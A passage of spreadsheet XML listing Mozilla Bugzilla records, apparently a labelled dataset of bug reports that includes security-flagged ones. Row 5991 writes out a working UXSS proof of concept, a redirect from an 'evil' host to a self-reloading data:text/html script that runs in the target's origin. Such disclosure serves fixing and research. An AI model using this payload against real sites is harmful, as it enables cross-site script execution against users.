      </c>
      <c r="P5988" t="inlineStr">
        <is>
          <t>security</t>
        </is>
      </c>
      <c r="Q5988" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5988" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5988" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T5988" t="n">
        <v>1</v>
      </c>
      <c r="U5988" t="n">
        <v>0</v>
      </c>
      <c r="V5988" t="n">
        <v>7</v>
      </c>
      <c r="W5988" t="inlineStr">
        <is>
          <t>http://bugzilla.mozilla.org/show_bug.cgi?id=28698 says "permission denied".
http://bugzilla.mozilla.org/showdependencygraph.cgi?id=28698 doesn't. 
(supposedly, when showdependencygraph.cgi is working, it lets you see the 
summaries of the bugs involved in addition to the bug numbers.)</t>
        </is>
      </c>
      <c r="X5988" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5989">
      <c r="A5989" t="n">
        <v>1177451</v>
      </c>
      <c r="B5989" t="inlineStr">
        <is>
          <t>2015-06-25 11:41:47 -0700</t>
        </is>
      </c>
      <c r="C5989" t="inlineStr">
        <is>
          <t>expander for date selectors says &amp;raquo;</t>
        </is>
      </c>
      <c r="D5989" t="inlineStr">
        <is>
          <t>2017-01-11 13:59:51 -0800</t>
        </is>
      </c>
      <c r="E5989" t="n">
        <v>1</v>
      </c>
      <c r="F5989" t="n">
        <v>1</v>
      </c>
      <c r="G5989" t="n">
        <v>6</v>
      </c>
      <c r="H5989" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5989" t="inlineStr">
        <is>
          <t>Input Graveyard</t>
        </is>
      </c>
      <c r="J5989" t="inlineStr">
        <is>
          <t>Dashboard</t>
        </is>
      </c>
      <c r="K5989" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5989" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5989" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5989" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5989" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5989" t="inlineStr">
        <is>
          <t>u=user c=dashboard p= s=input.2015q2</t>
        </is>
      </c>
      <c r="Q5989" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5989" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5989" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5989" t="n">
        <v>1</v>
      </c>
      <c r="U5989" t="n">
        <v>0</v>
      </c>
      <c r="V5989" t="n">
        <v>4</v>
      </c>
      <c r="W5989" t="inlineStr">
        <is>
          <t>On the front page dashboard in the upper left hand corner, there's a date selector. That date selector has a &gt;&gt; button which is &amp;raquo;. It looks like the &amp; is getting escaped, so it shows up as "&amp;raquo;" in the form.
That string is localized in the fjord/analytics/templates/analytics/dashboard.html template.
I suspect this happened after we switched off of tower. Seems like the localized string is not marked as safe. This might affect other things as well, but it's possible it just affects anything in _().
This bug covers fixing this specific issue.
Also, we might want to look at the strings in the .pot file and see if other strings are affected by the same thing and then check to see if they look terrible in the interface as well.</t>
        </is>
      </c>
      <c r="X5989" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5990">
      <c r="A5990" t="n">
        <v>220332</v>
      </c>
      <c r="B5990" t="inlineStr">
        <is>
          <t>2003-09-25 22:53:20 -0700</t>
        </is>
      </c>
      <c r="C5990" t="inlineStr">
        <is>
          <t>Insecure dependency in exec while running with -T switch at process_bug.cgi line 1267.</t>
        </is>
      </c>
      <c r="D5990" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:37 -0800</t>
        </is>
      </c>
      <c r="E5990" t="n">
        <v>1</v>
      </c>
      <c r="F5990" t="n">
        <v>1</v>
      </c>
      <c r="G5990" t="n">
        <v>4</v>
      </c>
      <c r="H5990" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5990" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5990" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K5990" t="inlineStr">
        <is>
          <t>2.16.3</t>
        </is>
      </c>
      <c r="L5990" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5990" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5990" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5990" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5990" t="inlineStr">
        <is>
          <t>[fixed for 2.16.4] [does not affect trunk]</t>
        </is>
      </c>
      <c r="Q5990" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5990" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5990" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T5990" t="n">
        <v>1</v>
      </c>
      <c r="U5990" t="n">
        <v>0</v>
      </c>
      <c r="V5990" t="n">
        <v>10</v>
      </c>
      <c r="W5990" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.5b) Gecko/20030907
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.5b) Gecko/20030907
seems to be related to bug 177828
Reproducible: Didn't try
Steps to Reproduce:
1. add text and remove a cc in one change
2.
3.
Actual Results:  
no mails were sent out
Expected Results:  
mails should have been sent out</t>
        </is>
      </c>
      <c r="X5990" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5991">
      <c r="A5991" t="n">
        <v>1353975</v>
      </c>
      <c r="B5991" t="inlineStr">
        <is>
          <t>2017-04-05 20:57:36 -0700</t>
        </is>
      </c>
      <c r="C5991" t="inlineStr">
        <is>
          <t>UXSS: Origin confusion when reloading isolated data:text/html URL</t>
        </is>
      </c>
      <c r="D5991" t="inlineStr">
        <is>
          <t>2024-05-30 09:31:24 -0700</t>
        </is>
      </c>
      <c r="E5991" t="n">
        <v>1</v>
      </c>
      <c r="F5991" t="n">
        <v>1</v>
      </c>
      <c r="G5991" t="n">
        <v>3</v>
      </c>
      <c r="H5991" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5991" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5991" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K5991" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L5991" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5991" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5991" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5991" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5991" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main53+][adv-esr52.1+]</t>
        </is>
      </c>
      <c r="Q5991" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5991" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5991" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T5991" t="n">
        <v>1</v>
      </c>
      <c r="U5991" t="n">
        <v>0</v>
      </c>
      <c r="V5991" t="n">
        <v>62</v>
      </c>
      <c r="W5991" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Build ID: 20170323105023
Steps to reproduce:
- Assume http://target/ has a link to http://evil/ and a victim user clicks the link.
  &lt;a href=http://evil&gt;link&lt;/a&gt;
- http://evil/ redirects to data:text/html URL with Location header.
  Location: data:text/html,&lt;script&gt;d=document.domain;if(d){alert(d)}else{location.reload()}&lt;/script&gt;
- The page's JavaScript executes location.reload() because its origin is blank.
Actual results:
The reloaded data:text/html page runs in the context of http://target.
So, in the example above, a popup saying "target" shows up.
The test redirector is at http://ttera.lolipop.jp/.
The attack was confirmed to work on the latest version (v52.0.2 on Windows7 / MacOS 10).
Expected results:
The reloaded page should run in a blank isolated origin.</t>
        </is>
      </c>
      <c r="X5991" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5992">
      <c r="A5992" t="n">
        <v>1460361</v>
      </c>
      <c r="B5992" t="inlineStr">
        <is>
          <t>2018-05-09 10:31:44 -0700</t>
        </is>
      </c>
      <c r="C5992" t="inlineStr">
        <is>
          <t>Auth by token sets session cookie</t>
        </is>
      </c>
      <c r="D5992" t="inlineStr">
        <is>
          <t>2018-05-09 10:42:01 -0700</t>
        </is>
      </c>
      <c r="E5992" t="n">
        <v>1</v>
      </c>
      <c r="F5992" t="n">
        <v>1</v>
      </c>
      <c r="G5992" t="n">
        <v>4</v>
      </c>
      <c r="H5992" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5992" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5992" t="inlineStr">
        <is>
          <t>Symbols</t>
        </is>
      </c>
      <c r="K5992" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5992" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5992" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5992" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5992" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5992" t="inlineStr"/>
      <c r="Q5992" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5992" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5992" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5992" t="n">
        <v>1</v>
      </c>
      <c r="U5992" t="n">
        <v>0</v>
      </c>
      <c r="V5992" t="n">
        <v>3</v>
      </c>
      <c r="W5992" t="inlineStr">
        <is>
          <t>$ curl -v -H 'Auth-Token: tokentokentoken' https://symbols.mozilla.org/api/tokens/ &gt; /dev/null
  ...
  &lt; Set-Cookie: sessionid=p52er9g7ca5rxmszmgx8n0kyma7m1pkg; expires=Thu, 09-May-2019 17:30:33 GMT; HttpOnly; Max-Age=31536000; Path=/; Secure
  ...
There is no need to start a new session cookie.</t>
        </is>
      </c>
      <c r="X5992" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5993">
      <c r="A5993" t="n">
        <v>466586</v>
      </c>
      <c r="B5993" t="inlineStr">
        <is>
          <t>2008-11-24 18:12:49 -0800</t>
        </is>
      </c>
      <c r="C5993" t="inlineStr">
        <is>
          <t>eBay preview image occasionally disappears after briefly appearing</t>
        </is>
      </c>
      <c r="D5993" t="inlineStr">
        <is>
          <t>2013-03-25 15:23:25 -0700</t>
        </is>
      </c>
      <c r="E5993" t="n">
        <v>1</v>
      </c>
      <c r="F5993" t="n">
        <v>1</v>
      </c>
      <c r="G5993" t="n">
        <v>3</v>
      </c>
      <c r="H5993" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5993" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5993" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K5993" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5993" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5993" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5993" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5993" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5993" t="inlineStr"/>
      <c r="Q5993" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5993" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5993" t="inlineStr">
        <is>
          <t>mozilla1.9.1b4</t>
        </is>
      </c>
      <c r="T5993" t="n">
        <v>1</v>
      </c>
      <c r="U5993" t="n">
        <v>0</v>
      </c>
      <c r="V5993" t="n">
        <v>65</v>
      </c>
      <c r="W5993" t="inlineStr">
        <is>
          <t>Summary: eBay preview image occasionally disappears after briefly appearing
URL: http://cgi.ebay.com/ebaymotors/Cars-Trucks___1-OWNER-NAVIGATION-REAR-BACK-UP-CAMERA-A-C-SEATS_W0QQitemZ110315606502QQddnZCarsQ20Q26Q20TrucksQQddiZ2282QQcmdZViewItemQQptZUS_Cars_Trucks?hash=item110315606502&amp;_trksid=p4506.c0.m245&amp;_trkparms=72%3A727|65%3A12|39%3A1|240%3A1308
Steps to Reproduce:
1. Load http://cgi.ebay.com/ebaymotors/Cars-Trucks___1-OWNER-NAVIGATION-REAR-BACK-UP-CAMERA-A-C-SEATS_W0QQitemZ110315606502QQddnZCarsQ20Q26Q20TrucksQQddiZ2282QQcmdZViewItemQQptZUS_Cars_Trucks?hash=item110315606502&amp;_trksid=p4506.c0.m245&amp;_trkparms=72%3A727|65%3A12|39%3A1|240%3A1308
2. If the preview image on the left stays, then force a refresh/reload using SHIFT+Reload
Actual Results:
Sometimes, the preview image disappears after it briefly appears
Expected Results:
The preview image should always remain</t>
        </is>
      </c>
      <c r="X5993" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5994">
      <c r="A5994" t="n">
        <v>36547</v>
      </c>
      <c r="B5994" t="inlineStr">
        <is>
          <t>2000-04-20 11:37:44 -0700</t>
        </is>
      </c>
      <c r="C5994" t="inlineStr">
        <is>
          <t>[FEATURE]session history does not handle frames (so no back and forward)</t>
        </is>
      </c>
      <c r="D5994" t="inlineStr">
        <is>
          <t>2008-07-31 02:33:20 -0700</t>
        </is>
      </c>
      <c r="E5994" t="n">
        <v>1</v>
      </c>
      <c r="F5994" t="n">
        <v>1</v>
      </c>
      <c r="G5994" t="n">
        <v>3</v>
      </c>
      <c r="H5994" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5994" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5994" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K5994" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5994" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5994" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5994" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5994" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5994" t="inlineStr">
        <is>
          <t>[nsbeta2+][PDT-]</t>
        </is>
      </c>
      <c r="Q5994" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5994" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5994" t="inlineStr">
        <is>
          <t>M17</t>
        </is>
      </c>
      <c r="T5994" t="n">
        <v>1</v>
      </c>
      <c r="U5994" t="n">
        <v>4</v>
      </c>
      <c r="V5994" t="n">
        <v>54</v>
      </c>
      <c r="W5994" t="inlineStr">
        <is>
          <t>On that smoketest page, if you load it in a seperate window, and press the first
link, the frame loads, but there is no back button
this is on m16 2000042008.  marking blocker due to granrose's recommendation</t>
        </is>
      </c>
      <c r="X5994" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5995">
      <c r="A5995" t="n">
        <v>52804</v>
      </c>
      <c r="B5995" t="inlineStr">
        <is>
          <t>2000-09-15 10:23:02 -0700</t>
        </is>
      </c>
      <c r="C5995" t="inlineStr">
        <is>
          <t>Linux installer installs unusable build</t>
        </is>
      </c>
      <c r="D5995" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E5995" t="n">
        <v>1</v>
      </c>
      <c r="F5995" t="n">
        <v>1</v>
      </c>
      <c r="G5995" t="n">
        <v>2</v>
      </c>
      <c r="H5995" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5995" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J5995" t="inlineStr">
        <is>
          <t>Build Config</t>
        </is>
      </c>
      <c r="K5995" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5995" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5995" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5995" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5995" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5995" t="inlineStr">
        <is>
          <t>[dogfood+]</t>
        </is>
      </c>
      <c r="Q5995" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5995" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5995" t="inlineStr">
        <is>
          <t>M18</t>
        </is>
      </c>
      <c r="T5995" t="n">
        <v>1</v>
      </c>
      <c r="U5995" t="n">
        <v>0</v>
      </c>
      <c r="V5995" t="n">
        <v>22</v>
      </c>
      <c r="W5995" t="inlineStr">
        <is>
          <t>Steps to reproduce:
1. download installer -for build 2000091506M18	
2. Install complete setup type
Actual results: error message saying -621 .xpi file did not install (did not
mention which one, installer was in psm module
N6 did not launch 
Expected results: all xpi files installed, launch
*Note Mozilla installer complete without error message but also did not launch,
will attach install logs</t>
        </is>
      </c>
      <c r="X5995" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5996">
      <c r="A5996" t="n">
        <v>1416542</v>
      </c>
      <c r="B5996" t="inlineStr">
        <is>
          <t>2017-11-11 19:30:25 -0800</t>
        </is>
      </c>
      <c r="C5996" t="inlineStr">
        <is>
          <t>font: Crash in [@ std::_Hashtable&lt;T&gt;::_M_find_before_node ]</t>
        </is>
      </c>
      <c r="D5996" t="inlineStr">
        <is>
          <t>2017-11-21 10:55:10 -0800</t>
        </is>
      </c>
      <c r="E5996" t="n">
        <v>1</v>
      </c>
      <c r="F5996" t="n">
        <v>1</v>
      </c>
      <c r="G5996" t="n">
        <v>3</v>
      </c>
      <c r="H5996" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5996" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5996" t="inlineStr">
        <is>
          <t>Graphics: WebRender</t>
        </is>
      </c>
      <c r="K5996" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5996" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5996" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5996" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5996" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5996" t="inlineStr">
        <is>
          <t>[wr-reserve] [gfx-noted]</t>
        </is>
      </c>
      <c r="Q5996" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5996" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5996" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T5996" t="n">
        <v>1</v>
      </c>
      <c r="U5996" t="n">
        <v>0</v>
      </c>
      <c r="V5996" t="n">
        <v>5</v>
      </c>
      <c r="W5996" t="inlineStr">
        <is>
          <t>Nightly 58 x64 20171110100139 de_DE @ Debian Testing (KDE, Radeon RX480)
main profile: gpu-process, layers force accel, webrender, blob-images, omtp, stylo-chrome
I didn't notice it.
bp-5569605d-a7d0-4e62-a353-91fe40171111 11.11.17 16:30
begins with:
&gt;  0 	libxul.so 	std::_Hashtable&lt;mozilla::wr::FontKey, std::pair&lt;const mozilla::wr::FontKey, mozilla::wr::FontTemplate&gt;, std::allocator&lt;std::pair&lt;const mozilla::wr::FontKey, mozilla::wr::FontTemplate&gt; &gt;, std::__detail::_Select1st, std::equal_to&lt;mozilla::wr::FontKey&gt;, std::hash&lt;mozilla::wr::FontKey&gt;, std::__detail::_Mod_range_hashing, std::__detail::_Default_ranged_hash, std::__detail::_Prime_rehash_policy, std::__detail::_Hashtable_traits&lt;true, false, true&gt; &gt;::_M_find_before_node 	gcc/include/c++/6.4.0/bits/hashtable.h:1417
There are two other crash reports (build 20171107122447) that are not from me.
bp-562465e2-fd54-4b5a-afaf-9da880171108
bp-59223223-cc88-4366-9207-ae5f40171108</t>
        </is>
      </c>
      <c r="X5996" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5997">
      <c r="A5997" t="n">
        <v>737559</v>
      </c>
      <c r="B5997" t="inlineStr">
        <is>
          <t>2012-03-20 11:48:25 -0700</t>
        </is>
      </c>
      <c r="C5997" t="inlineStr">
        <is>
          <t>"Assertion failure: !proto-&gt;getClass()-&gt;ext.outerObject"</t>
        </is>
      </c>
      <c r="D5997" t="inlineStr">
        <is>
          <t>2013-03-11 16:59:51 -0700</t>
        </is>
      </c>
      <c r="E5997" t="n">
        <v>1</v>
      </c>
      <c r="F5997" t="n">
        <v>1</v>
      </c>
      <c r="G5997" t="n">
        <v>3</v>
      </c>
      <c r="H5997" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5997" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5997" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5997" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5997" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5997" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5997" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5997" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5997" t="inlineStr">
        <is>
          <t>[sg:moderate][advisory-tracking+] don't land, will be fixed by 754044</t>
        </is>
      </c>
      <c r="Q5997" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5997" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5997" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5997" t="n">
        <v>1</v>
      </c>
      <c r="U5997" t="n">
        <v>0</v>
      </c>
      <c r="V5997" t="n">
        <v>25</v>
      </c>
      <c r="W5997" t="inlineStr">
        <is>
          <t>Created attachment 607646
testcase (asserts fatally when loaded)
Assertion failure: !proto-&gt;getClass()-&gt;ext.outerObject, at js/src/jsinferinlines.h:1162
This assertion was added in bug 719841.</t>
        </is>
      </c>
      <c r="X5997" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5998">
      <c r="A5998" t="n">
        <v>894868</v>
      </c>
      <c r="B5998" t="inlineStr">
        <is>
          <t>2013-07-17 05:02:31 -0700</t>
        </is>
      </c>
      <c r="C5998" t="inlineStr">
        <is>
          <t>[STK]The value of the GET INPUT textbox remains previous value.</t>
        </is>
      </c>
      <c r="D5998" t="inlineStr">
        <is>
          <t>2013-08-07 20:14:33 -0700</t>
        </is>
      </c>
      <c r="E5998" t="n">
        <v>1</v>
      </c>
      <c r="F5998" t="n">
        <v>1</v>
      </c>
      <c r="G5998" t="n">
        <v>6</v>
      </c>
      <c r="H5998" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5998" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J5998" t="inlineStr">
        <is>
          <t>Gaia::System</t>
        </is>
      </c>
      <c r="K5998" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5998" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M5998" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N5998" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5998" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5998" t="inlineStr">
        <is>
          <t>[TD-64763][u=commsapps-user c=messaging p=1]</t>
        </is>
      </c>
      <c r="Q5998" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5998" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5998" t="inlineStr">
        <is>
          <t>1.1 QE4 (15jul)</t>
        </is>
      </c>
      <c r="T5998" t="n">
        <v>1</v>
      </c>
      <c r="U5998" t="n">
        <v>0</v>
      </c>
      <c r="V5998" t="n">
        <v>8</v>
      </c>
      <c r="W5998" t="inlineStr">
        <is>
          <t>Pre condidition:
Insert  SIM Card profile 7
Description:
Turn on Mobile,
Wait register in network;
Go to  settings &gt; Vivo Chip&gt; Games&gt;  Vivo Ego &gt;  Register &gt; Nick Name &gt; Man &gt;  Age;
Check Behavior.
Expected:
After entry with a value in field and go to next, the next  field should be empty.
Actual:
The values ??that are entered in the field "nickname" appear in the field of "age".
Example: If typing in the nickname  "Test 123" and press ok, the next step which is the old field will be filled with "test 123" too.</t>
        </is>
      </c>
      <c r="X5998" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5999">
      <c r="A5999" t="n">
        <v>624187</v>
      </c>
      <c r="B5999" t="inlineStr">
        <is>
          <t>2011-01-08 13:13:37 -0800</t>
        </is>
      </c>
      <c r="C5999" t="inlineStr">
        <is>
          <t>Use after free after appending a frame/iframe element to a DOM tree with the NoScript add-on enabled.</t>
        </is>
      </c>
      <c r="D5999" t="inlineStr">
        <is>
          <t>2024-05-29 15:48:07 -0700</t>
        </is>
      </c>
      <c r="E5999" t="n">
        <v>1</v>
      </c>
      <c r="F5999" t="n">
        <v>1</v>
      </c>
      <c r="G5999" t="n">
        <v>3</v>
      </c>
      <c r="H5999" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5999" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5999" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K5999" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5999" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5999" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5999" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5999" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5999" t="inlineStr">
        <is>
          <t>[sg:critical?][hardblocker] not sure if exploitable w/out addon</t>
        </is>
      </c>
      <c r="Q5999" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5999" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5999" t="inlineStr">
        <is>
          <t>mozilla2.0b10</t>
        </is>
      </c>
      <c r="T5999" t="n">
        <v>1</v>
      </c>
      <c r="U5999" t="n">
        <v>0</v>
      </c>
      <c r="V5999" t="n">
        <v>23</v>
      </c>
      <c r="W5999" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13
Build Identifier: Mozilla Firefox 3.6.13
After appending a frame with a src of "#" to a title element with the NoScript add-on enabled, Firefox will usually crash. This is caused by a read of freed memory. The crash is usually occurring in nsDocShellEnumerator::GetNext(nsISupports**).
I have tested this in Firefox 3.6.13 with NoScript 2.0.9.3 on Ubuntu 10.04 (64 bit) and Windows Vista (32 bit).
Reproducible: Sometimes
Steps to Reproduce:
1. Open the attached testcase, 1.html, in Firefox with the NoScript add-on enabled.
2. If a crash does not occur immediately, either refresh the page a few times, or close the browser. The crash after closing is extremely consistent, but refreshing the page a few times seems to do the trick.
Actual Results:  
The browser will either crash after loading the page, or at exit.
Expected Results:  
The particular script should be executed as expected, and the browser should not crash.
The html file that produces the crash, a stack trace using gdb, and output from valgrind will be attached after this bug is created. If I discover any other useful information about this bug, I will include it.</t>
        </is>
      </c>
      <c r="X5999" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6000">
      <c r="A6000" t="n">
        <v>1181334</v>
      </c>
      <c r="B6000" t="inlineStr">
        <is>
          <t>2015-07-07 14:30:25 -0700</t>
        </is>
      </c>
      <c r="C6000" t="inlineStr">
        <is>
          <t>Upgrade angular bootstrap to 0.13.0</t>
        </is>
      </c>
      <c r="D6000" t="inlineStr">
        <is>
          <t>2015-07-08 11:12:27 -0700</t>
        </is>
      </c>
      <c r="E6000" t="n">
        <v>1</v>
      </c>
      <c r="F6000" t="n">
        <v>1</v>
      </c>
      <c r="G6000" t="n">
        <v>7</v>
      </c>
      <c r="H6000" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6000" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
